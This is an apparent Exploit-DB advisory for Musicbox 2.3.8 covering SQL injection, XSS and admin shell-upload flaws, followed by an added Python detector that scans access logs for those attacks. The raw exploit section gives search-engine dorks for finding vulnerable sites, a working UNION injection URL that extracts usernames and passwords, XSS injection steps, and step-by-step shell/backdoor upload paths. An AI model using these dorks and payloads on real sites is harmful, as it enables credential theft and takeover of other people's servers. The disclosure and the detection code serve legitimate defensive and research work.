Vendor: Musicbox
By: DevilScreaM
CVSS: 7.5 (HIGH)
Vulnerabilities: SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability
CWE: 89, 79, 264
Product Name: Musicbox
Affected Version From: 1.0
Affected Version To: 2.3.8
Patch Exists: NO
Related CWE: N/A
CPE: a:musicboxv2:musicbox
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 32 Bit (Mozilla & Chrome)
2013

Musicbox 2.3.8 Multiple Vulnerabilities

Musicbox 2.3.8 is vulnerable to SQL Injection, XSS and Shell Upload. An attacker can exploit these vulnerabilities by sending malicious payloads to the vulnerable parameters. For SQL Injection, the vulnerable parameter is 'id' in the URL 'genre_albums.php?id=[SQLI]'. For XSS, the vulnerable parameters are 'term' and 'details' in the URL 'index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0' and 'member.php?uname=[YOUR_USERNAME]'. For Shell Upload, the vulnerable parameter is 'action' in the URL 'admin/adminpanel.php?action=artistgallery'. An attacker can upload a malicious shell/backdoor and access it via 'images/artist/shell.php'.

Mitigation:

Validate input on the server side so that malicious payloads never reach the vulnerable parameters, and restrict access to the admin panel to trusted users only.
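As an added example (not part of the advisory or the Musicbox project), the following Python detection logic scans combined-format web access logs for the request shapes this advisory describes: UNION-style payloads in the `id` parameter of `genre_albums.php`, HTML tags in the search `term` parameter, POSTs to the admin gallery upload actions, and PHP files served from the gallery image directories. The log lines, IP addresses and rule names are constructed for the example; the stored XSS on `member.php` is not visible in request logs and needs application-side output checks instead.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log sample (combined log format, not taken from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [25/Aug/2013:10:01:02 +0000] "GET /genre_albums.php?id=3 HTTP/1.1" 200 5120
10.0.0.9 - - [25/Aug/2013:10:01:07 +0000] "GET /genre_albums.php?id=-3+UNION%20SELECT%201,2,3+from+users-- HTTP/1.1" 200 640
10.0.0.9 - - [25/Aug/2013:10:02:11 +0000] "GET /index.php?in=song&term=%3Ch1%3Etest%3C/h1%3E&action=search&start=0 HTTP/1.1" 200 880
10.0.0.9 - - [25/Aug/2013:10:03:30 +0000] "POST /admin/adminpanel.php?action=artistgallery HTTP/1.1" 302 0
10.0.0.9 - - [25/Aug/2013:10:03:41 +0000] "GET /artist_gallery/cmd.php?x=id HTTP/1.1" 200 77
10.0.0.7 - - [25/Aug/2013:10:04:00 +0000] "GET /index.php?in=song&term=rock&action=search&start=0 HTTP/1.1" 200 2300
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3})')
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|concat_ws\s*\(|--\s*$", re.I)   # id= payload shapes
TAG_RE = re.compile(r"<\s*/?[a-z][^>]*>|\bon\w+\s*=", re.I)                 # reflected-XSS shapes
UPLOAD_DIRS = ("/artist_gallery/", "/album_gallery/", "/images/artist/")   # paths named by the advisory
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")

def classify(line):
    """Return the rule names one access-log line triggers (empty list if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("url"))
    params = parse_qs(parts.query, keep_blank_values=True)  # percent- and plus-decodes values
    path = parts.path.lower()
    rules = []
    if path.endswith("/genre_albums.php") and any(SQLI_RE.search(v) for v in params.get("id", [])):
        rules.append("sqli_genre_albums_id")
    if path.endswith("/index.php") and any(TAG_RE.search(v) for v in params.get("term", [])):
        rules.append("xss_search_term")
    if (m.group("method") == "POST" and path.endswith("/admin/adminpanel.php")
            and params.get("action", [""])[0] in ("artistgallery", "albumgallery")):
        rules.append("admin_gallery_upload")          # benign alone; suspicious if followed by rule below
    if path.startswith(UPLOAD_DIRS) and path.endswith(SCRIPT_EXT):
        rules.append("php_in_upload_dir")             # image directories should never serve PHP
    return rules

def scan(log_text):
    """Group triggered rules by client IP, in log order, skipping unparseable lines."""
    hits = {}
    for line in log_text.splitlines():
        rules = classify(line)
        if rules:
            ip = LOG_RE.match(line).group("ip")
            hits.setdefault(ip, []).extend(rules)
    return hits
```

Running `scan(SAMPLE_LOG)` attributes all four rules to the single source 10.0.0.9, which is the sequence a defender would want to alert on: an upload POST to the admin gallery followed within seconds by a request for a `.php` file under `artist_gallery/`.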

Exploit-DB raw data:

#Exploit Title   : Musicbox 2.3.8 Multiple Vulnerabilities
#Author          : DevilScreaM
#Date            : 25/08/2013
#Category        : Web Applications
#Vendor          : http://www.musicboxv2.com/
#Version         : 1.0 - 2.3.8

#Dork
intext:Musicbox Version
intext:Musicbox Version 2.3.8 © 2008
inurl:genre_albums.php?id=

#Vulnerability   : SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability
#Tested On       : Windows 7 32 Bit (Mozilla & Chrome)
#Greetz          : Newbie-Security.or.id
 

SQL Injection Vulnerability

http://site-target/genre_albums.php?id=[SQLI]

Example
http://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--

==========================================================================================

Cross site scripting / XSS Vulnerability

*Search

1. Go to the Search feature

2. Input your Cross Site Scripting payload, for example "<h1>Tested by DevilScreaM</h1>", and click Search

3. See the result

or see it via the URL

http://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0

Example

http://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0


========================================================================================

*News Profile

1. Register on the website or go to the link http://site-target/register.php

2. Log in to the website

3. Go to the menu [ My News ]

4. In the News Heading, input your XSS, for example <h1>Tested by DevilScreaM</h1>

And in Details, input your XSS or text

See your XSS at http://site-target/member.php?uname=[YOUR_USERNAME]

Example

http://server/musicbox/member.php?uname=devilscream


==========================================================================================

Shell Upload Vulnerability 

*Artist Gallery

1. Go to the Admin page and log in

2. Go to Upload Artist Image or go to the link

http://site-target/admin/adminpanel.php?action=artistgallery

3. Select your shell/backdoor and click Submit

4. Result uploaded at

http://site-target/artist_gallery/Your_Backdoor.php


============================================================================================

*Album Gallery

1. Go to the Admin page and log in

2. Go to Upload Album Image or go to the link

http://site-target/admin/adminpanel.php?action=albumgallery

3. Select an option, for example the option "All Album", and click Submit

4. Select your shell/backdoor and click Submit

5. Result uploaded at

http://site-target/album_gallery/Your_Backdoor.php


==========================================================================================